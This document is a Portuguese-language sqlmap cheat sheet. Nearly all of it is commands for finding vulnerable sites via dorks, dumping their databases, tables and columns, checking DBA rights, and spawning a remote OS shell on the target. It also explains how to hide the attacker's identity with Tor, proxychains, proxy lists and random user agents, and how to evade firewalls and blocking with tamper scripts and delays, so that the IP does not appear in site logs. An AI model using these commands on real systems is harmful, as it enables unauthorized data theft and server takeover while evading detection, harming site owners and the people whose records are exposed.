➖➖➖➖➖ COMANDOS ➖➖➖➖➖
sqlmap -g e a dork q vc for usar
sqlmap -m (link do arquivo com os sites alvo)
sqlmap -u (sitealvo) --dbs
sqlmap -u (sitealvo) -D (bancodedadosdosite) --tables
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) --columns
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) -C (opcaodesejada)
--dump
sqlmap -u (sitealvo) -D (bancodedadosdosite) --columns # te lista todas as colunas
de todas as tabelas
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) --dump # baixa
todas as colunas da tabela
==============SQLMAP TRABALHANDO COM O TOR====================
É importante lembra que o uso do tor pode deixar todo p processo mais lento !
apt-get install tor #instalar tor
service tor status # pra conferir se o tor está ligado ou não
service tor start #liga o tor
sqlmap -u (sitealvo) --dbs --tor --check-tor --tor-type=SOCKS5 # dessa maneira voce
utiliza o tor junto com o sqlmap e evitar ter seu ip rastreado no logs do site
voce pode usar outro tipo de type de requisição do tor exemplo: --tor-type= (HTTP,
HTTPS, SOCKS4, SOCKS5)
sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 --dbs #voce pode usar
dessa forma tbm
sqlmap --tor --check-tor --tor-type=SOCKS5 -u (sitealvo) --dbs #ou dessa outra
forma
sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 -level 3 --risk 3 -v4 --
dbms "mysql" --dbs # essa maneira vc voce pode aumentar ou nivel de testes a serem
enviado no scam do site
voce pode usar do level 1-até 5 e o risk vc pode usar 1 até o 3
--level (1-5)
--risk(1-3)
ja o -v é o modo verbose do sqlmap , ele vai te dar mais detalhes do que a
ferramenta está fazendo! voce aumentar tbm os valores indo
-v(0-6) do 0 até o 6
sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 --level 3 --risk 3 -v4 --
dbs #voce tbm pode usar o camando dessa mandeira caso voce não saiba o tipo do sql
do back-end do site
sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --
tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast --dbs # analise profunda usando o tor
(obs: o comando --random-agent é muito importe pois ele usa um user-agente
diferente evitiando que os sites consiga identificar o sqlmap pelo user agente da
ferramenta! dessa forma o sqlmap se passa como se fosse um navagador normal de um
pc ou celular ! isso ira ajudar muito !
voce pode substituir o --random-agent pelo --user-agent=(COLOCAR O agent aqui)
porem dessa outra forma vc tem q colocar o user agente manualmente
sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --
tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast -D (bancodedadosdosite) --is-dba # maneira de ver
se tem uma bda na db do ste, normalmente se tiver vai retornar True, caso contratio
false
sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --
tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast -D (bancodedadosdoste) --os-shell #subindo shell
remota com o tor
===================================================================================
===================================================================================
===============================
================SEM USAR O
TOR================================================================================
========================================
SEM A UTILIZAÇÃO DO TOR O PRECESSO É MAIS RAPAIDO ! POREM SEU IP FICARA LA NOS LOG
DO SITE ! O IDEAL É UTILIZAR UMA VPN PELO MENOS
sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --
delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast --dbs # comando anasile profunda
sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --
delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast -D (bancodedadosdosite) --is-dba # maneira de ver se tem uma
bda na db do ste, normalmente se tiver vai retornar True, caso contratio false
sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --
delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast -D (bancodedadosdosite) --os-shell #subindo shell remota sem o tor
===================================================================================
===================================================================================
==================================================================
================================SQLMAP UTILIZANDO O
PROXYCHAINS========================================================================
=============================================
(OBS: TODOS OS OUTROS COMANDOS CITADOS A CIMA PODEM SER UTILIZADOS NORMALMENTE COM
O PROXYCHAINS, POREM SE FOR USAR O PROXYCHAINS NÃO PODERA UTILZADA O COMANDO "--
ignore-proxy")
proxychains sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --random-agent -D
(bancodedadosdosite) --os-shell --threads 10
proxychains sqlmap -u (sitealvo) -v2 ---level=3 --risk=3 --random-agent -D
(bancodedadosdoste) --os-shell --threads 10
================ALGUMAS INFORMAÇOES EXTRAS SQLMAP==================
--proxy-file=(coloca o arquivo com suas proxys) ele vai usar as proxy para fazer as
requisiçoes
--tor-port=(numero da porta) com esse comando vc configura o tor para poder
trabalhar com aquela porta especifica
--delay=(quantos 5 de delay) fazendo isso ele vai da um pausa nas requisiçoe no
site (isso fara q vc o scan demore mais ! pode ajudar a evitar bloqueio do
servidor)
--threads=(quantidade) aqui voce controla a quantidade de conexões q voce vai esta
fazendo na database do site
--time-sec=(quantidade)com isso ele vai atrasar as resposta do banco de dados do
site pra vc , isso ajuda a evitar bloquio de firewoll